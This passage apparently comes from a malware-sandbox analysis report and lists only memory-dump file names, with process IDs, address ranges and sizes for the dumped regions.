memory/980-194-0x000000001AC70000-0x000000001AC72000-memory.dmpFilesize
8KB
-
memory/1068-151-0x0000000000000000-mapping.dmp
-
memory/1100-459-0x00000217FDA20000-0x00000217FDA94000-memory.dmpFilesize
464KB
-
memory/1116-115-0x0000000000000000-mapping.dmp
-
memory/1420-160-0x0000000000000000-mapping.dmp
-
memory/1596-135-0x0000000000000000-mapping.dmp
-
memory/1708-158-0x0000000064940000-0x0000000064959000-memory.dmpFilesize
100KB
-
memory/1708-131-0x000000006B440000-0x000000006B4CF000-memory.dmpFilesize
572KB
-
memory/1708-132-0x000000006FE40000-0x000000006FFC6000-memory.dmpFilesize
1.5MB
-
memory/1708-165-0x0000000064940000-0x0000000064959000-memory.dmpFilesize
100KB
-
memory/1708-133-0x000000006B280000-0x000000006B2A6000-memory.dmpFilesize
152KB
-
memory/1708-170-0x0000000064940000-0x0000000064959000-memory.dmpFilesize
100KB
-
memory/1708-118-0x0000000000000000-mapping.dmp
-
memory/1708-167-0x0000000064940000-0x0000000064959000-memory.dmpFilesize
100KB
-
memory/1812-272-0x0000000000000000-mapping.dmp
-
memory/1812-326-0x0000000000C70000-0x0000000000C71000-memory.dmpFilesize
4KB
-
memory/1812-350-0x00000000055E0000-0x00000000055E1000-memory.dmpFilesize
4KB
-
memory/1852-310-0x0000000002160000-0x000000000217F000-memory.dmpFilesize
124KB
-
memory/1852-348-0x0000000002134000-0x0000000002136000-memory.dmpFilesize
8KB
-
memory/1852-154-0x0000000000000000-mapping.dmp
-
memory/1852-323-0x0000000002132000-0x0000000002133000-memory.dmpFilesize
4KB
-
memory/1852-313-0x0000000002130000-0x0000000002131000-memory.dmpFilesize
4KB
-
memory/1852-308-0x0000000000400000-0x0000000000453000-memory.dmpFilesize
332KB
-
memory/1852-327-0x0000000002133000-0x0000000002134000-memory.dmpFilesize
4KB
-
memory/1852-304-0x0000000000460000-0x000000000050E000-memory.dmpFilesize
696KB
-
memory/1852-325-0x00000000023C0000-0x00000000023DE000-memory.dmpFilesize
120KB
-
memory/1920-481-0x0000026A84380000-0x0000026A843F4000-memory.dmpFilesize
464KB
-
memory/2088-147-0x0000000000000000-mapping.dmp
-
memory/2124-351-0x0000000001120000-0x0000000001135000-memory.dmpFilesize
84KB
-
memory/2164-145-0x0000000000000000-mapping.dmp
-
memory/2288-233-0x0000000007220000-0x0000000007221000-memory.dmpFilesize
4KB
-
memory/2288-211-0x00000000012B2000-0x00000000012B3000-memory.dmpFilesize
4KB
-
memory/2288-420-0x000000007EF60000-0x000000007EF61000-memory.dmpFilesize
4KB
-
memory/2288-208-0x00000000012B0000-0x00000000012B1000-memory.dmpFilesize
4KB
-
memory/2288-230-0x00000000071F0000-0x00000000071F1000-memory.dmpFilesize
4KB
-
memory/2288-231-0x00000000078F0000-0x00000000078F1000-memory.dmpFilesize
4KB
-
memory/2288-224-0x0000000007130000-0x0000000007131000-memory.dmpFilesize
4KB
-
memory/2288-234-0x00000000079E0000-0x00000000079E1000-memory.dmpFilesize
4KB
-
memory/2288-236-0x00000000070B0000-0x00000000070B1000-memory.dmpFilesize
4KB
-
memory/2288-245-0x0000000008000000-0x0000000008001000-memory.dmpFilesize
4KB
-
memory/2288-210-0x00000000072C0000-0x00000000072C1000-memory.dmpFilesize
4KB
-
memory/2288-484-0x00000000012B3000-0x00000000012B4000-memory.dmpFilesize
4KB
-
memory/2288-207-0x0000000001240000-0x0000000001241000-memory.dmpFilesize
4KB
-
memory/2288-157-0x0000000000000000-mapping.dmp
-
memory/2288-266-0x0000000007960000-0x0000000007961000-memory.dmpFilesize
4KB
-
memory/2344-444-0x0000022132900000-0x0000022132974000-memory.dmpFilesize
464KB
-
memory/2364-448-0x000001AC4E600000-0x000001AC4E674000-memory.dmpFilesize
464KB
-
memory/2380-451-0x00000000001D0000-0x00000000001FF000-memory.dmpFilesize
188KB
-
memory/2380-299-0x0000000000000000-mapping.dmp
-
memory/2380-141-0x0000000000000000-mapping.dmp
-
memory/2380-462-0x0000000000400000-0x000000000043F000-memory.dmpFilesize
252KB
-
memory/2568-416-0x0000011BEE500000-0x0000011BEE574000-memory.dmpFilesize
464KB
-
memory/2592-143-0x0000000000000000-mapping.dmp
-
memory/2636-139-0x0000000000000000-mapping.dmp
-
memory/2648-156-0x0000000000000000-mapping.dmp
-
memory/2648-214-0x0000000002420000-0x0000000002421000-memory.dmpFilesize
4KB
-
memory/2648-201-0x00000000001C0000-0x00000000001C1000-memory.dmpFilesize
4KB
-
memory/2648-217-0x0000000004980000-0x0000000004981000-memory.dmpFilesize
4KB
-
memory/2648-249-0x0000000005440000-0x0000000005441000-memory.dmpFilesize
4KB
-
memory/2836-137-0x0000000000000000-mapping.dmp
-
memory/3060-423-0x0000025ED5740000-0x0000025ED578D000-memory.dmpFilesize
308KB
-
memory/3060-405-0x0000025ED5800000-0x0000025ED5874000-memory.dmpFilesize
464KB
-
memory/3204-319-0x0000000000000000-mapping.dmp
-
memory/3732-248-0x0000000000000000-mapping.dmp
-
memory/3732-252-0x00000000007D0000-0x00000000007D1000-memory.dmpFilesize
4KB
-
memory/3776-169-0x0000000000000000-mapping.dmp
-
memory/3796-149-0x0000000000000000-mapping.dmp
-
memory/3800-317-0x0000000000A00000-0x0000000000A01000-memory.dmpFilesize
4KB
-
memory/3800-305-0x0000000000B70000-0x0000000000B71000-memory.dmpFilesize
4KB
-
memory/3800-283-0x0000000000000000-mapping.dmp
-
memory/3800-290-0x0000000000200000-0x0000000000201000-memory.dmpFilesize
4KB
-
memory/3840-155-0x0000000000000000-mapping.dmp
-
memory/3968-253-0x0000000000000000-mapping.dmp
-
memory/3968-408-0x0000000002260000-0x0000000002334000-memory.dmpFilesize
848KB
-
memory/3968-428-0x0000000000400000-0x00000000004D7000-memory.dmpFilesize
860KB
-
memory/4128-175-0x0000000000000000-mapping.dmp
-
memory/4136-174-0x0000000000000000-mapping.dmp
-
memory/4160-177-0x0000000000000000-mapping.dmp
-
memory/4160-202-0x0000000000C80000-0x0000000000C81000-memory.dmpFilesize
4KB
-
memory/4160-220-0x0000000005610000-0x0000000005611000-memory.dmpFilesize
4KB
-
memory/4160-212-0x00000000054B0000-0x00000000054B1000-memory.dmpFilesize
4KB
-
memory/4160-225-0x0000000005B20000-0x0000000005B21000-memory.dmpFilesize
4KB
-
memory/4160-215-0x0000000005460000-0x0000000005461000-memory.dmpFilesize
4KB
-
memory/4184-180-0x0000000000000000-mapping.dmp
-
memory/4228-321-0x0000000000000000-mapping.dmp
-
memory/4228-330-0x0000000000400000-0x0000000000414000-memory.dmpFilesize
80KB
-
memory/4268-206-0x0000000000400000-0x000000000042C000-memory.dmpFilesize
176KB
-
memory/4268-185-0x0000000000000000-mapping.dmp
-
memory/4276-318-0x0000000000000000-mapping.dmp
-
memory/4276-370-0x0000000077080000-0x000000007720E000-memory.dmpFilesize
1.6MB
-
memory/4276-393-0x0000000006190000-0x0000000006191000-memory.dmpFilesize
4KB
-
memory/4284-291-0x0000000000550000-0x000000000069A000-memory.dmpFilesize
1.3MB
-
memory/4284-186-0x0000000000000000-mapping.dmp
-
memory/4284-293-0x0000000000400000-0x000000000044C000-memory.dmpFilesize
304KB
-
memory/4300-187-0x0000000000000000-mapping.dmp
-
memory/4300-320-0x0000000000400000-0x000000000042C000-memory.dmpFilesize
176KB
-
memory/4300-309-0x0000000000430000-0x000000000057A000-memory.dmpFilesize
1.3MB
-
memory/4348-191-0x0000000000000000-mapping.dmp
-
memory/4348-332-0x0000000000400000-0x00000000004D7000-memory.dmpFilesize
860KB
-
memory/4348-301-0x0000000002120000-0x00000000021F4000-memory.dmpFilesize
848KB
-
memory/4372-193-0x0000000000000000-mapping.dmp
-
memory/4388-275-0x00000000009F0000-0x0000000000A02000-memory.dmpFilesize
72KB
-
memory/4388-258-0x0000000000000000-mapping.dmp
-
memory/4388-269-0x00000000005F0000-0x0000000000600000-memory.dmpFilesize
64KB
-
memory/4392-195-0x0000000000000000-mapping.dmp
-
memory/4392-232-0x0000000005F80000-0x0000000005F81000-memory.dmpFilesize
4KB
-
memory/4392-235-0x0000000005F10000-0x0000000005F11000-memory.dmpFilesize
4KB
-
memory/4392-237-0x0000000005FC0000-0x0000000005FC1000-memory.dmpFilesize
4KB
-
memory/4392-229-0x0000000006050000-0x0000000006051000-memory.dmpFilesize
4KB
-
memory/4392-228-0x0000000005F20000-0x0000000005F21000-memory.dmpFilesize
4KB
-
memory/4392-227-0x0000000006530000-0x0000000006531000-memory.dmpFilesize
4KB
-
memory/4392-222-0x0000000000A90000-0x0000000000A91000-memory.dmpFilesize
4KB
-
memory/4392-218-0x0000000077080000-0x000000007720E000-memory.dmpFilesize
1.6MB
-
memory/4460-297-0x0000000000C20000-0x0000000000C21000-memory.dmpFilesize
4KB
-
memory/4460-312-0x0000000001410000-0x0000000001411000-memory.dmpFilesize
4KB
-
memory/4460-286-0x0000000000000000-mapping.dmp
-
memory/4496-372-0x00000000024A0000-0x00000000024D5000-memory.dmpFilesize
212KB
-
memory/4496-262-0x0000000000000000-mapping.dmp
-
memory/4512-221-0x00000000001E0000-0x00000000001E1000-memory.dmpFilesize
4KB
-
memory/4512-205-0x0000000000000000-mapping.dmp
-
memory/4596-213-0x0000000000000000-mapping.dmp
-
memory/4664-417-0x0000019F80FD0000-0x0000019F81044000-memory.dmpFilesize
464KB
-
memory/4672-274-0x0000000000000000-mapping.dmp
-
memory/4800-226-0x0000000000000000-mapping.dmp
-
memory/4836-289-0x0000000000000000-mapping.dmp
-
memory/4852-316-0x0000000005010000-0x0000000005011000-memory.dmpFilesize
4KB
-
memory/4852-314-0x0000000004FF0000-0x0000000004FF1000-memory.dmpFilesize
4KB
-
memory/4852-324-0x00000000072B0000-0x0000000007303000-memory.dmpFilesize
332KB
-
memory/4852-295-0x00000000005B0000-0x00000000005B1000-memory.dmpFilesize
4KB
-
memory/4852-281-0x0000000000000000-mapping.dmp
-
memory/4852-307-0x0000000004F50000-0x0000000004F51000-memory.dmpFilesize
4KB
-
memory/4968-241-0x00000000007A0000-0x00000000007A1000-memory.dmpFilesize
4KB
-
memory/4968-238-0x0000000000000000-mapping.dmp
-
memory/5024-265-0x0000000000400000-0x0000000000422000-memory.dmpFilesize
136KB
-
memory/5024-270-0x000000000041C5CA-mapping.dmp
-
memory/5024-296-0x0000000005620000-0x0000000005C26000-memory.dmpFilesize
6.0MB
-
memory/5060-255-0x0000000002FE0000-0x0000000002FE2000-memory.dmpFilesize
8KB
-
memory/5060-244-0x0000000000000000-mapping.dmp
-
memory/5232-362-0x0000000005880000-0x0000000005881000-memory.dmpFilesize
4KB
-
memory/5232-335-0x0000000000000000-mapping.dmp
-
memory/5248-336-0x0000000000000000-mapping.dmp
-
memory/5320-339-0x0000000000000000-mapping.dmp
-
memory/5344-403-0x0000000004BCD000-0x0000000004CCE000-memory.dmpFilesize
1.0MB
-
memory/5344-412-0x0000000004B50000-0x0000000004BAF000-memory.dmpFilesize
380KB
-
memory/5344-394-0x0000000000000000-mapping.dmp
-
memory/5368-341-0x0000000000000000-mapping.dmp
-
memory/5392-342-0x0000000000000000-mapping.dmp
-
memory/5392-396-0x00000000057E0000-0x00000000057E1000-memory.dmpFilesize
4KB
-
memory/5404-343-0x0000000000000000-mapping.dmp
-
memory/5404-359-0x00000000001E0000-0x00000000001E1000-memory.dmpFilesize
4KB
-
memory/5456-344-0x0000000000000000-mapping.dmp
-
memory/5504-426-0x00000000001E0000-0x00000000001E1000-memory.dmpFilesize
4KB
-
memory/5528-480-0x0000000004E10000-0x0000000004E11000-memory.dmpFilesize
4KB
-
memory/5620-352-0x0000000000000000-mapping.dmp
-
memory/5620-361-0x0000000005730000-0x0000000005731000-memory.dmpFilesize
4KB
-
memory/5760-482-0x00000000010B0000-0x00000000010F0000-memory.dmpFilesize
256KB
-
memory/6040-374-0x0000000000000000-mapping.dmp
-
memory/6044-383-0x0000000000400000-0x0000000000414000-memory.dmpFilesize
80KB
-
memory/6044-373-0x0000000000000000-mapping.dmp
-
memory/6140-456-0x00000000057C0000-0x00000000057C1000-memory.dmpFilesize
4KB